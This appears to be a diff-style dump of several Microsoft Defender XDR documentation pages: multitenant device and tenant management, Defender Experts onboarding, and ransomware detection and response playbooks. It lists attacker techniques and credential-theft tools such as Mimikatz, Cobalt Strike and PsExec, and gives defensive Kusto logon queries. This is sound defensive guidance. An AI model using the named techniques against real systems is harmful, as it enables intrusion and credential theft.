--- [View and manage incidents and alerts](./mto-incidents-alerts.md)-- [Advanced hunting](./mto-advanced-hunting.md)-- [Multi-tenant devices](./mto-tenant-devices.md)-- [Vulnerability management](./mto-dashboard.md)-- [Manage tenants](./mto-tenants.md)
security Mto Tenant Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-tenant-devices.md
- Title: Devices in multitenant management
-description: Learn about multitenant device view in multitenant management of the Microsoft Defender XDR.
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 03/15/2024--
-# Devices
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-The **Devices** page in multitenant management enables you to quickly manage tenants and devices.
-
-## Tenant device list
-
-The Tenants page in multitenant management lists each tenant you have access to. Each tenant page includes details such as the number of devices and device types, the number of high value and high exposure devices, and the number of devices available to onboard:
-
- :::image type="content" source="../../media/multi-tenant/devices/devices-tenant-view.png" alt-text="Screenshot of the Microsoft Defender XDR tenants list in the Devices page" lightbox="../../media/multi-tenant/devices/devices-tenant-view.png":::
-
-At the top of the page, you can view the number of tenants and the number of devices onboarded or discovered, across all tenants. You can also see the aggregate number of devices identified as:
--- High risk-- High exposure-- Internet facing-- Can be onboarded-- Newly discovered-- High value-
-Select a tenant name to navigate to the device inventory for that tenant in the [Microsoft Defender XDR](https://security.microsoft.com/machines) portal where all data and inventory-related actions are available.
-
-## Device inventory
-
-The Device inventory page lists all the devices in each tenant that you have access to. The page is like the [Defender for Endpoint device inventory](../defender-endpoint/machines-view-overview.md) with the addition of the **Tenant name** column. Moreover, the device inventory page doesn't have the network, IOT, and uncategorized devices tabs.
-
-You can navigate to the device inventory page by selecting **Assets > Devices** in Microsoft Defender XDR's navigation menu.
-
- :::image type="content" source="../../media/multi-tenant/devices/devices-device-inventory.png" alt-text="Screenshot of the Microsoft Defender XDR Devices page for multitenant management" lightbox="../../media/multi-tenant/devices/devices-device-inventory.png":::
-
-The total number of devices, critical assets, high risk devices, and internet-facing devices for all tenants are shown at the top of the page.
-
-You can search a specific device with the search function. You can sort and filter the device list according to the following fields to customize your view:
--- Tenant name-- Risk level-- Criticality level-- Mitigation status-- Cloud platforms-- Operating system (OS) platforms-- Windows OS version-- Sensor health state-- Antivirus status-- Tags-- First seen-- Internet facing-- Group-- Exclusion state-- Managed by-
-To manage a device, select a specific device from the list. Device management tasks like managing tags, device exclusion, and reporting inaccuracy becomes available at the top of the device list.
-
- :::image type="content" source="../../media/multi-tenant/devices/devices-choose-device.png" alt-text="Screenshot of choosing a device from the device inventory list" lightbox="../../media/multi-tenant/devices/devices-choose-device.png":::
-
-Selecting a device by clicking on the device name opens the device page in a new tab. You can further apply other actions on the device in the new tab.
security Mto Tenants https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/mto-tenants.md
- Title: Manage tenants with multitenant management in Microsoft Defender XDR
-description: Learn about the tenant list in multitenant management in Microsoft Defender XDR
-----
- - m365-security
- - highpri
- - tier1
- Previously updated : 03/20/2024--
-# Manage tenants
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-## View the tenants page
-
-To view the list of tenants that appear in multitenant management, go to [Settings page](https://mto.security.microsoft.com/mtosettings) in multitenant management in Microsoft Defender XDR:
-
- :::image type="content" source="../../media/defender/mto-tenant-settings.png" alt-text="Screenshot of multitenant management in Microsoft Defender XDR" lightbox="../../media/defender/mto-tenant-settings.png":::
-
-From the **Settings** page you can:
--- **Add a tenant**: Select **Add tenants** > Choose the tenants to want to add > Select **Add tenant**.-- Select a tenant from the list to open the [Microsoft Defender portal](https://security.microsoft.com) for that tenant.-- **Remove a tenant**: Select the tenant you'd like to remove > select **Remove**.-
-## Multitenant management status indicator
-
-The multitenant management status indicator provides information on whether data issues exist for the page you're viewing, such as data loading issues or permissions issues. The indicator appears in the bottom right corner of the page:
-
-When no issue exists, the status indicator is a green tick:
--- ![No data issues](../../media/defender/mto_nodata_issue.png)-
-When an issue exists, the status indicator shows a red warning sign:
--- ![data issues](../../media/defender/mto-data-issues.png)-
-Hovering over the red warning sign displays the issues that occurred and the tenant information. By expanding each section, you see all the tenants with this issue.
--- ![tenant data issues](../../media/defender/mto-tenantdata-issues.png)
security Onboarding Defender Experts For Hunting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/onboarding-defender-experts-for-hunting.md
- Title: How to subscribe to Microsoft Defender Experts for Hunting-
-description: If you're new to Microsoft Defender XDR and Defender Experts for Hunting, this is how you onboard, receive, and set up Defender experts notifications.
-keywords: managed threat hunting service,onboarding to Defender Experts, sample DEN, defender experts notifications, Ask Defender Experts, MTE, Microsoft Threat Experts, EOD, endpoint attack notifications, Microsoft Defender Experts for hunting, managed response.
-search.product: Windows 10
-
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - tier1
- - essentials-get-started
- Previously updated : 04/18/2024--
-# Start using Microsoft Defender Experts for Hunting
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-## Onboarding
-
-If you're new to Microsoft Defender XDR and Defender Experts for Hunting:
-
-1. Upon getting your welcome email, select **Log into Microsoft Defender XDR**.
-2. Sign in if you already have a Microsoft account. If none, create one.
-3. The Microsoft Defender XDR quick tour gets you familiar with the security suite, where the capabilities are and how important they are. Select **Take a quick tour**.
-4. Read the short descriptions about what the Microsoft Defender Experts service is and the capabilities it provides. Select **Next**. You see the welcome page:
-
-![Screenshot of the Microsoft Defender XDR welcome page with a card for the Defender Experts for Hunting service.](../../media/mte/defenderexperts/start-using-defender-experts-for-hunting.png)
-
-## Receive Defender Experts Notifications
-
-The Defender Experts Notifications service includes:
--- Threat monitoring and analysis, reducing dwell time and the risk to your business-- Hunter-trained artificial intelligence to discover and target both known attacks and emerging threats-- Identification of the most pertinent risks, helping SOCs maximize their effectiveness-- Help in scoping compromises and as much context as can be quickly delivered to enable a swift SOC response-
-Refer to the following screenshot to see a sample Defender Experts Notification:
-
-![Screenshot of a Defender Experts Notification in Microsoft Defender XDR. A Defender Expert Notification includes a title that describes the threat or activity observed, an executive summary, and list of recommendations.](../../media/mte/defenderexperts/receive-defender-experts-notification.png)
-
-### Where to find Defender Experts Notifications
-
-You can receive Defender Experts Notifications from Defender Experts through the following mediums:
--- The Microsoft Defender portal's [Incidents](https://security.microsoft.com/incidents) page-- The Microsoft Defender portal's [Alerts](https://security.microsoft.com/alerts) page-- OData alerting [API](../../security/defender-endpoint/get-alerts.md) and [REST API](../defender-endpoint/configure-siem.md)-- [DeviceAlertEvents](../../security/defender-endpoint/advanced-hunting-devicealertevents-table.md) table in Advanced hunting-- Your email if you [configure an email notifications rule](/microsoft-365/security/defender/onboarding-defender-experts-for-hunting#set-up-defender-experts-email-notifications)-
-### Filter to view just the Defender Experts Notifications
-
-You can filter your incidents and alerts if you want to only see the Defender Experts Notifications among the many alerts. To do so:
-
-1. On the navigation menu, go to **Incidents & alerts** > **Incidents** > select the ![Filter icon](../../media/mte/defenderexperts/filter.png) icon.
-2. Scroll down to **Service/detection sources** then select the **Microsoft Defender Experts** checkboxes under *Microsoft Defender for Endpoint* and *Microsoft Defender XDR*.
-3. Select **Apply**.
-
-### Set up Defender Experts email notifications
-
-You can set up Microsoft Defender XDR to notify you or your staff with an email about new incidents or updates to existing incidents, including those observed by Microsoft Defender Experts. [Learn more about getting incident notifications by email](/microsoft-365/security/defender/incidents-overview#get-incident-notifications-by-email)
-
-1. In the Microsoft Defender XDR navigation pane, select **Settings** > **Microsoft Defender XDR** > **Email notifications** > **Incidents**.
-2. Update your existing email notification rules or create a new one. [Learn more about creating a rule for email notifications](/microsoft-365/security/defender/incidents-overview#create-a-rule-for-email-notifications)
-3. On the rule's **Notification settings** page, make sure to configure the following:
- - **Source** ΓÇô Choose **Microsoft Defender Experts** under **Microsoft Defender XDR** and **Microsoft Defender for Endpoint**
- - **Alert severity** ΓÇô Choose the alert severities that will trigger an incident notification. For example, if you only want to be informed about high-severity incidents, select High.
-
-### Generate sample Defender Experts Notifications
-
-You can generate a sample Defender Experts Notification to start experiencing the Defender Experts for Hunting service without having to wait for an actual critical activity to happen in your environment. Generating a sample notification also lets you test the [email notifications](#set-up-defender-experts-email-notifications) you might have previously configured in the Microsoft Defender portal for this service, as well as test the configuration of playbooks (if configured for such notifications) and rules in your Security Information and Event Management (SIEM) environment.
-
-A sample Defender Experts Notification shows up in your **Incidents** page with the title _Defender Experts: Test Notification from Microsoft Defender Experts_. The [contents](#receive-defender-experts-notifications) of the notification are placeholder texts, while the other elements such as alerts are randomly generated from events present in your tenant and aren't actually impacted.
--
-**To generate a sample notification:**
-
-1. In your Microsoft Defender XDR navigation pane, go to **Settings** > **Defender Experts** and then select **Sample notifications**.
-2. Select **Generate a sample notification**. A green status message appears, confirming that your sample notification is ready for review.
-3. Under **Recently generated Defender Experts Notification**, select a link from the list to view its corresponding generated sample notification. The most recent sample appears on the top of the list. Selecting a link redirects you to the **Incidents** page.
--
-### Next step
--- [Access Defender Experts Notifications using Microsoft Graph security API](access-den-graph-api.md)
security Playbook Detecting Ransomware M365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/playbook-detecting-ransomware-m365-defender.md
- Title: Detecting human-operated ransomware attacks with Microsoft Defender XDR
-description: This article describes proactive detection of new or ongoing human-operated ransomware attacks with the Microsoft Defender portal
---- Previously updated : 05/30/2022 ---
- - zerotrust-solution
- - msftsolution-secops
- - tier1
--
-# Detecting human-operated ransomware attacks with Microsoft Defender XDR
--
-Ransomware is a type of extortion attack that destroys or encrypts files and folders, preventing access to critical data or disrupting critical business systems. There are two types of ransomware:
--- Commodity ransomware is malware that spreads with phishing or between devices and encrypts files before demanding a ransom.-- Human-operated ransomware is a planned and coordinated attack by active cybercriminals who employ multiple attack methods. In many cases, known techniques and tools are used to infiltrate your organization, find the assets or systems worth extorting, and then demand a ransom. Upon compromising a network, the attacker carries out reconnaissance of assets and systems which can be encrypted or extorted. The attackers then encrypt or exfiltrate data before demanding a ransom.-
-This article describes proactive detection of new or ongoing human-operated ransomware attacks with the Microsoft Defender portal, an extended detection and response (XDR) solution for the following security
--- Microsoft Defender for Endpoint-- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps (including the app governance add-on)-- Microsoft Entra ID Protection-- Microsoft Defender for IoT-- Microsoft 365 Business Premium-- Microsoft Defender for Business-
-For information about preventing ransomware attacks, see [Quickly deploy ransomware preventions - Phase 3: Make it hard to get in](/security/ransomware/protect-against-ransomware-phase3).
-
-## The importance of proactive detection
-
-Because human-operated ransomware is typically performed by active attackers who might be performing the steps to infiltrate and discover your most valuable data and systems in real time, the time taken to detect ransomware attacks is crucial.
-
-If pre-ransom activities are detected quickly, the likelihood of a severe attack decreases. The pre-ransom stage typically includes the following techniques: initial access, reconnaissance, credential theft, lateral movement, and persistence. These techniques can initially seem unrelated and often fly under the radar. If these techniques lead to the ransom stage, it's often too late. Microsoft Defender XDR can help identify those small and seemingly unrelated incidents as possibly part of a larger ransomware campaign.
--- When detected during the pre-ransom stage, smaller-scale mitigations such as isolating infected devices or user accounts can be used to disrupt and remediate the attack.-- If detection comes at a later stage, such as when the malware used to encrypt files is being deployed, more aggressive remediation steps that can cause downtime might need to be used to disrupt and remediate the attack.-
-Business operation disruptions are likely when responding to a ransomware attack. The end stage of a ransomware attack is often a choice between downtime caused by attackers with major risks, or a controlled downtime to ensure network safety and give you time to fully investigate. We never recommend paying a ransom. Paying cybercriminals to get a ransomware decryption key provides no guarantee that your encrypted data will be restored. See, [Ransomware response - Microsoft Security Blog](https://www.microsoft.com/security/blog/2019/12/16/ransomware-response-to-pay-or-not-to-pay/).
-
-Here's the qualitative relationship of the impact of a ransomware attack and your time to respond for no detection vs. proactive detection and response.
-
-![The qualitative relationship of the impact of a ransomware attack and your time to respond for no detection vs. proactive detection and response, showing the impact to your business reduces, the quicker you respond.](../../media/defender/playbook-detecting-ransomware-m365-defender-qualitative-diagram.png)
-
-### Proactive detection via common malware tools and techniques
-
-In many cases, human-operated ransomware attackers use well-known and field-tested malware tactics, techniques, tools, and procedures including phishing, business email compromise (BEC), and credential theft. Your security analysts must become aware of and familiar with how attackers use common malware and cyberattack methods to gain a foothold in your organization.
-
-To see examples of how ransomware attacks get started with common malware, see these resources:
--- [Human-operated ransomware attacks: A preventable disaster](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/)-- [Ransomware threat analytics reports in the Microsoft Defender portal](https://sip.security.microsoft.com/threatanalytics3?page_size=30&filters=tags%3DRansomware&ordering=-lastUpdatedOn&fields=displayName,alertsCount,impactedEntities,exposureLevel,MisconfiguredDevices,VulnerableDevices,reportType,createdOn,lastUpdatedOn,tags,flag)-
-Being familiar with pre-ransom malware, payloads, and activities helps your analysts know what to look for to prevent the later stages of an attack.
-
-## Human-operated ransomware attack tactics
-
-Because human-operated ransomware can use known attack techniques and tools, your analysts' understanding and experience with existing attack techniques and tools will be a valuable asset when preparing your SecOps team for focused ransomware detection practices.
-
-### Attack tactics and methods
-
-Here are some typical techniques and tools used by ransomware attackers for the following [MITRE ATT&CK](https://attack.mitre.org/tactics/enterprise/) tactics:
-
-Initial access:
--- RDP brute force-- Vulnerable internet-facing system-- Weak application settings-- Phishing email-
-Credential theft:
--- Mimikatz-- LSA secrets-- Credential vault-- Credentials in plaintext-- Abuse of service accounts-
-Lateral movement:
--- Cobalt Strike-- WMI-- Abuse of management tools-- PsExec-
-Persistence:
--- New accounts-- GPO changes-- Shadow IT tools-- Schedule tasks-- Service registration-
-Defense evasion:
--- Disabling security features-- Clearing log files-- Deleting attack artifact files-- Resetting timestamps on altered files-
-Exfiltration:
--- Exfiltration of sensitive data
-Impact (financial leverage):
-- Encryption of data in place and in backups-- Deletion of data in place and backups, which might be combined with a preceding exfiltration-- Threat of public leakage of exfiltrated, sensitive data-
-### What to look for
-
-The challenge for security analysts is recognizing when an alert is part of a larger attack chain with the goal of extorting your sensitive data or crucial systems. For example, a detected phishing attack might be:
--- A one-off attack to surveil the email messages of someone in the finance department of an organization.-- The pre-ransom part of an attack chain to use compromised user account credentials to discover the resources available to the user account and to compromise other user accounts with higher levels of privilege and access.-
-This section provides common attack phases and methods and the signal sources that feed into the central Microsoft Defender portal, which creates alerts and incidents composed of multiple related alerts for security analysis. In some cases, there are alternate security portals to view the attack data.
-
-#### Initial attacks to gain entry
-
-Attacker is attempting to compromise a user account, device, or app.
-
-|Attack method|Signal source|Alternate security portals|
-||||
-|RDP brute force|Defender for Endpoint|Defender for Cloud Apps|
-|Vulnerable internet-facing system|Windows security features, Microsoft Defender for Servers|
-|Weak application settings|Defender for Cloud Apps, Defender for Cloud Apps with the app governance add-on|Defender for Cloud Apps|
-|Malicious app activity|Defender for Cloud Apps, Defender for Cloud Apps with the app governance add-on|Defender for Cloud Apps|
-|Phishing email|Defender for Office 365|
-|Password spray against Microsoft Entra accounts|Microsoft Entra ID Protection via Defender for Cloud Apps|Defender for Cloud Apps|
-|Password spray against on-premises accounts|Microsoft Defender for Identity|
-|Device compromise|Defender for Endpoint|
-|Credential theft|Microsoft Defender for Identity|
-|Escalation of privilege|Microsoft Defender for Identity|
-
-#### Recent spike in otherwise typical behavior
-
-Attacker is attempting to probe for additional entities to compromise.
-
-|Spike category|Signal source|Alternate security portals|
-||||
-|Sign-ins: Numerous failed attempts, attempts to logon to multiple devices in a short period, multiple first-time logons, etc.|Microsoft Entra ID Protection via Defender for Cloud Apps, Microsoft Defender for Identity|Defender for Cloud Apps|
-|Recently active user account, group, machine account, app|Microsoft Entra ID Protection via Defender for Cloud Apps (Microsoft Entra ID), Defender for Identity (Active Directory Domain Services [AD DS])|Defender for Cloud Apps|
-|Recent app activity such as data access|Apps with Defender for Cloud Apps with the app governance add-on|Defender for Cloud Apps|
-
-#### New activity
-
-Attacker is creating new entities to further their reach, install malware agents, or evade detection.
-
-|Activity|Signal source|Alternate security portal|
-||||
-|New apps that are installed|Defender for Cloud Apps with the app governance add-on|Defender for Cloud Apps|
-|New user accounts|Azure Identity Protection|Defender for Cloud Apps|
-|Role changes|Azure Identity Protection|Defender for Cloud Apps|
-
-#### Suspicious behavior
-
-Attacker is downloading sensitive information, encrypting files, or otherwise collecting or damaging organization assets.
-
-|Behavior|Signal source|
-|||
-|Malware spread to multiple devices|Defender for Endpoint|
-|Resource scanning|Defender for Endpoint, Defender for Identity|
-|Changes in mailbox forwarding rules|Defender for Office 365|
-|Data exfiltration and encryption|Defender for Office 365|
---*Monitor for Adversary Disabling Security** ΓÇô as this is often part of human-operated ransomware (HumOR) attack chain--- **Event Logs Clearing** ΓÇô especially the Security Event log and PowerShell Operational logs-- **Disabling of security tools/controls** (associated with some groups)-
-<a name='detect-ransomware-attacks-with-the-microsoft-365-defender-portal'></a>
-
-## Detect ransomware attacks with the Microsoft Defender portal
-
-The Microsoft Defender portal provides a centralized view for information on detections, impacted assets, automated actions taken, and related evidence a combination of:
--- An incident queue, which groups related alerts for an attack to provide the full attack scope, impacted assets, and automated remediation actions.-- An alerts queue, which lists all of the alerts being tracked by Microsoft Defender XDR.-
-### Incident and alert sources
-
-Microsoft Defender portal centralizes signals from:
--- Microsoft Defender for Endpoint-- Microsoft Defender for Office 365-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps (including the app governance add-on)-- Microsoft Entra ID Protection-- Microsoft Defender for IoT-
-This table lists some typical attacks and their corresponding signal source for Microsoft Defender XDR.
-
-|Attacks and incidents|Signal source|
-|||
-|Cloud identity: Password spray, numerous failed attempts, attempts to log on to multiple devices in a short period, multiple first-time logons, recently active user accounts|Microsoft Entra ID Protection|
-|On-premises identity (AD DS) compromise|Defender for Identity|
-|Phishing|Defender for Office 365|
-|Malicious apps|Defender for Cloud Apps or Defender for Cloud Apps with app governance add-on|
-|Endpoint (device) compromise|Defender for Endpoint|
-|IoT-capable device compromise|Defender for IoT|
-
-### Filtering ransomware-identified incidents
-
-You can easily filter the incidents queue for incidents that have been categorized by Microsoft Defender XDR as ransomware.
-
-1. From the Microsoft Defender portal navigation pane, go to the incidents queue by selecting **Incidents and alerts > Incidents**.
-2. Select **Filters**.
-3. Under **Categories**, select **Ransomware**, select **Apply**, and then close the **Filters** pane.
-
-Each filter setting for the incidents queue creates a URL that you can save and access later as a link. These URLs can be bookmarked or otherwise saved and used when needed at a single click. For example, you can create bookmarks for:
--- Incidents containing the "ransomware" category. Here is the corresponding [link](https://security.microsoft.com/incidents?filters=AlertStatus%3DNew%257CInProgress,category%3Dransomware&page_size=30&fields=expand,name,tags,severity,investigationStates,category,impactedEntities,alertCount,serviceSource,detectionSource,firstEventTime,lastEventTime,sensitivity,status,incidentAssignment,classification,determination,rbacGroup).-- Incidents with a specified **Actor** name known to be performing ransomware attacks.-- Incidents with a specified **Associated threat** name known to be used in ransomware attacks.-- Incidents containing a custom tag that your SecOps team uses for incidents that are known to be part of a larger, coordinated ransomware attack.-
-### Filtering ransomware-identified threat analytics reports
-
-Similar to filtering incidents in the incident queue, you can filter threat analytics reports for reports that include ransomware.
-
-1. From the navigation pane, select **Threat analytics**.
-2. Select **Filters**.
-3. Under **Threat tags**, select **Ransomware**, select **Apply**, and then close the **Filters** pane.
-
-You can also click this link.
-
-From the **Detection details** section of many threat analytics reports, you can see a list of alert names created for the threat.
-
-<a name='microsoft-365-defender-apis'></a>
-
-### Microsoft Defender XDR APIs
-
-You can also use the Microsoft Defender XDR APIs to query the Microsoft Defender XDR incidents and alerts data in your tenant. A custom app can filter the data, filter it based on custom settings, and then provide a filtered list of links to alerts and incidents that you can easily select to go right to that alert or incident. See [List incidents API in Microsoft Defender XDR| Microsoft Docs](./api-list-incidents.md). You can also integrate your SIEM with Microsoft Defender, see [Integrate your SIEM tools with Microsoft Defender XDR](./configure-siem-defender.md).
-
-<a name='microsoft-365-defender-sentinel-integration'></a>
-
-### Microsoft Defender XDR Sentinel Integration
-
-Microsoft Sentinel's Microsoft Defender XDR incident integration allows you to stream all Microsoft Defender XDR incidents into Microsoft Sentinel and keep them synchronized between both portals. Incidents include all associated alerts, entities, and relevant information. Once in Sentinel, incidents will remain bi-directionally synced with Microsoft Defender XDR, allowing you to take advantage of the benefits of both portals in your incident investigation. See, [Microsoft Defender XDR integration with Microsoft Sentinel](/azure/sentinel/microsoft-365-defender-sentinel-integration).
-
-### Proactive scanning with advanced hunting
-
-[Advanced hunting](./advanced-hunting-overview.md) is a query-based threat hunting tool that lets you explore and inspect events in your network to locate threat indicators and entities. This flexible and customizable analysis tool enables unconstrained hunting for both known and potential threats. Microsoft Defender XDR also supports using a custom query to create [custom detection rules](./custom-detections-overview.md), which create alerts based on a query can be and scheduled to run automatically.
-
-For proactive scanning of ransomware activities, you should assemble a catalog of advanced hunting queries for commonly used ransomware attack methods for identities, endpoints, apps, and data. Here are some key sources for ready-to-use advanced hunting queries:
--- The [Hunt for ransomware](./advanced-hunting-find-ransomware.md) article-- GitHub repository for advanced hunting queries:
- - [Ransomware-specific](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Ransomware) queries
- - [All categories](https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Ransomware) of queries
-- Threat analytics reports
- - Advanced hunting section of the [Ransomware: A pervasive and ongoing threat](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) analyst report
- - Advanced hunting section of other analyst reports
-
-### Automated hunting
-
-Advanced hunting queries can also be used to create custom detection rules and actions based on known elements of a ransomware attack method (for example, the use of unusual PowerShell commands). Custom detection rules create alerts that can be seen and addressed by your security analysts.
-
-To create a custom detection rule, select **Create custom detection** rule from the page of an advanced hunting query. Once created, you can specify:
--- How often to run the custom detection rule-- The severity of the alert created by the rule-- The MITRE attack phase for the created alert-- Impacted entities-- Actions to take on impacted entities-
-## Prepare your SecOps Team for focused ransomware detection
-
-Preparing your SecOps team for proactive ransomware detection requires:
--- Pre-work for your SecOps team and organization-- Security analyst training, as needed-- Ongoing operational work to incorporate the latest attacks and detection experiences of your security analysts-
-### Pre-work for your SecOps team and organization
-
-Consider these steps to get your SecOps team and organization ready for focused ransomware attack prevention:
-
-1. Configure your IT and cloud infrastructure for ransomware prevention with the [Quickly deploy ransomware preventions - Phase 3: Make it hard to get in](/security/ransomware/protect-against-ransomware-phase3) guidance. The phases and tasks in this guidance can be done in parallel with the following steps.
-2. Get the appropriate licenses for the Defender for Endpoint, Defender for Office 365, Defender for Identity, Defender for Cloud Apps, the app governance add-on, Defender for IoT, and Microsoft Entra ID Protection services.
-3. Assemble a catalog of advanced hunting queries tuned for known ransomware attack methods or attack phases.
-4. Create the set of custom detection rules for specific advanced hunting queries that create alerts for known ransomware attack methods, including their schedule, alert naming, and automated actions.
-5. Determine the set of [custom tags](./manage-incidents.md) or standards to create new one to identify incidents that are known to be part of a larger, coordinated ransomware attack
-6. Determine the set of operational tasks for ransomware incident and alert management. For example:
- - Processes for Tier 1 analyst scanning of incoming incidents and alerts and assignment to Tier 2 analysts for investigation.
- - Manually running advanced hunting queries and their schedule (daily, weekly, monthly).
- - Ongoing changes based on ransomware attack investigation and mitigation experiences.
-
-### Security analyst training
-
-As needed, you can provide your security analysts with internal training for:
--- Common ransomware attack chains (MITRE attack tactics and common threat techniques and malware)-- Incidents and alerts and how to locate and analyze them in the Microsoft Defender portal using:
- - Alerts and incidents already created by Microsoft Defender XDR
- - Pre-scanned URL-based filters for the Microsoft Defender portal
- - Programmatically via the incidents API
-- Advanced hunting queries to use and their manual schedule (daily, weekly, monthly)-- Custom detection rules to use and their settings-- Custom incident tags-- The latest [threat analytics reports for ransomware](https://security.microsoft.com/threatanalytics3?page_size=30&filters=tags%3DRansomware&ordering=-lastUpdatedOn&fields=displayName,alertsCount,impactedEntities,reportType,createdOn,lastUpdatedOn,tags,flag) attacks in the Microsoft Defender portal-
-### Ongoing work based on operational learning and new threats
-
-As part of your SecOps team's ongoing tool and process best practices and security analysts' experiences, you should:
--- Update your catalog of advanced hunting queries with:
- - New queries based on the latest threat analytics reports in the Microsoft Defender portal or the [Advanced Hunting GitHub repository](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/tree/master/Ransomware>).
- - Changes to existing ones to optimize for threat identification or for better alert quality.
-- Update custom detection rules based on new or changed advanced hunting queries.-- Update the set of operational tasks for ransomware detection.--
security Playbook Responding Ransomware M365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/playbook-responding-ransomware-m365-defender.md
- Title: Responding to ransomware attacks
-description: This article provides a generalized playbook for responding to ransomware attacks.
---- Previously updated : 05/30/2022 ---
- - zerotrust-solution
- - msftsolution-secops
- - tier1
-
-# Responding to ransomware attacks
--
-When you suspect you were or are currently under a ransomware attack, establish secure communications with your incident response team immediately. They can perform the following response phases to disrupt the attack and mitigate the damage:
-
-* Investigation and containment
-* Eradication and recovery
-
-This article provides a generalized playbook for responding to ransomware attacks. Consider adapting the described steps and tasks in this article to your own security operations playbook.
-NOTE: For information about preventing ransomware attacks, see [Quickly deploy ransomware preventions](/security/ransomware/protect-against-ransomware).
-
-## Containment
-
-Containment and investigation should occur as simultaneously as possible; however, you should focus on quickly achieving containment, so you have more time to investigate. These steps help you determine the scope of the attack and to isolate it to only affected entities, such as user accounts and devices.
-
-### Step 1: Assess the scope of the incident
-
-Run through this list of questions and tasks to discover the extent of the attack. Microsoft Defender XDR can provide a consolidated view of all impacted or at-risk assets to aid in your incident response assessment. See [Incident response with Microsoft Defender XDR](incidents-overview.md). You can use the alerts and the evidence list in the incident to determine:
-
-* Which user accounts might be compromised?
- * Which accounts were used to deliver the payload?
-* Which [onboarded](../defender-endpoint/investigate-machines.md) and [discovered](../defender-endpoint/device-discovery.md) devices are affected and how?
- * Originating devices
- * Impacted devices
- * Suspicious devices
-* Identify any network communication that is associated with the incident.
-* Which applications are affected?
-* What payloads were spread?
-* How is the attacker communicating with the compromised devices? (Network protection must be [enabled](../defender-endpoint/enable-network-protection.md)):
- * Go to the [indicators page](../defender-endpoint/indicator-ip-domain.md#create-indicators-for-ips-and-urlsdomains) to add a block for the IP and URL (if you have that information).
-* What was the payload delivery medium?
-
-### Step 2: Preserve existing systems
-
-Run through this list of tasks and questions to protect existing systems from attack:
-
-* If you have online backups, consider disconnecting the backup system from the network until you're confident that the attack is contained, see [Backup and restore plan to protect against ransomware | Microsoft Docs](/azure/security/fundamentals/backup-plan-to-protect-against-ransomware).
-* If you're experiencing or expect an imminent and active ransomware deployment:
- * [Suspend privileged and local accounts](./investigate-users.md) that you suspect are part of the attack. You can do this from the **Users** tab in the properties of the incident in the Microsoft Defender portal.
- * Stop all [remote logon sessions](/defender-for-identity/playbook-domain-dominance).
- * Reset the compromised user account passwords and require the users of compromised user accounts to sign in again.
- * Do the same for user accounts that might be compromised.
- * If shared local accounts are compromised, have your IT admin help you to enforce a password change across all exposed devices. Example Kusto query:
-
-```kusto
-DeviceLogonEvents | where DeviceName contains (AccountDomain) | take 10
-```
-
-* For the devices that aren't yet isolated and aren't part of the critical infrastructure:
- * Isolate compromised devices from the network but don't shut them off.
- * If you identify the originating or spreader devices, isolate those first.
-* Preserve compromised systems for analysis.
-
-### Step 3: Prevent the spread
-
-Use this list to keep the attack from spreading to additional entities.
-
-* If shared local accounts are being used in the attack, consider [Blocking Remote Use of Local Accounts](https://techcommunity.microsoft.com/t5/microsoft-security-baselines/blocking-remote-use-of-local-accounts/ba-p/701042).
- * Kusto query for all network logons that are local admins:
-
-```kusto
-DeviceLogonEvents
-| where IsLocalAdmin == true and AccountDomain == DeviceName
-| extend IsLocalLogon = tobool(todynamic(AdditionalFields).IsLocalLogon)
-| where IsLocalLogon==false
-```
-
-* Kusto query for non-RDP logons (more realistic for most networks):
-
-```kusto
-DeviceLogonEvents
-| where IsLocalAdmin == true and AccountDomain == DeviceName and LogonType != 'RemoteInteractive'
-| extend IsLocalLogon = tobool(todynamic(AdditionalFields).IsLocalLogon)
-| where IsLocalLogon==false
-```
-
-* Quarantine and add indicators for files that are infected.
-* Ensure that your antivirus solution is configurable in its optimal protection state. For Microsoft Defender Antivirus, this includes:
- * [Real time protection](../defender-endpoint/configure-real-time-protection-microsoft-defender-antivirus.md) is enabled.
- * [Tamper protection](../defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection.md) is enabled. In the Microsoft Defender portal, select **Settings > Endpoints > Advanced features > Tamper protection**.
- * [Attack surface reduction](../defender-endpoint/enable-attack-surface-reduction.md) rules are enabled.
- * [Cloud protection](../defender-endpoint/enable-attack-surface-reduction.md) is enabled.
-* Disable Exchange ActiveSync and OneDrive sync.
- * To disable Exchange ActiveSync for a mailbox, see [How to disable Exchange ActiveSync for users in Exchange Online](/exchange/recipients-in-exchange-online/manage-user-mailboxes/enable-or-disable-exchange-activesync).
- * To disable other types of access to a mailbox, see:
- * [Enable or disable MAPI for a mailbox](/exchange/recipients-in-exchange-online/manage-user-mailboxes/enable-or-disable-mapi).
- * [Enable or Disable POP3 or IMAP4 access for a user](/exchange/clients-and-mobile-in-exchange-online/pop3-and-imap4/enable-or-disable-pop3-or-imap4-access).
- * Pausing OneDrive sync helps protect your cloud data from being updated by potentially infected devices. For more information, see [How to Pause and Resume sync in OneDrive](https://support.microsoft.com/office/how-to-pause-and-resume-sync-in-onedrive-2152bfa4-a2a5-4d3a-ace8-92912fb4421e).
-* Apply relevant patches and configuration changes on affected systems.
-* Block ransomware communications using internal and external controls.
-* Purge cached content
-
-## Investigation
-
-Use this section to investigate the attack and plan your response.
-
-### Assess your current situation
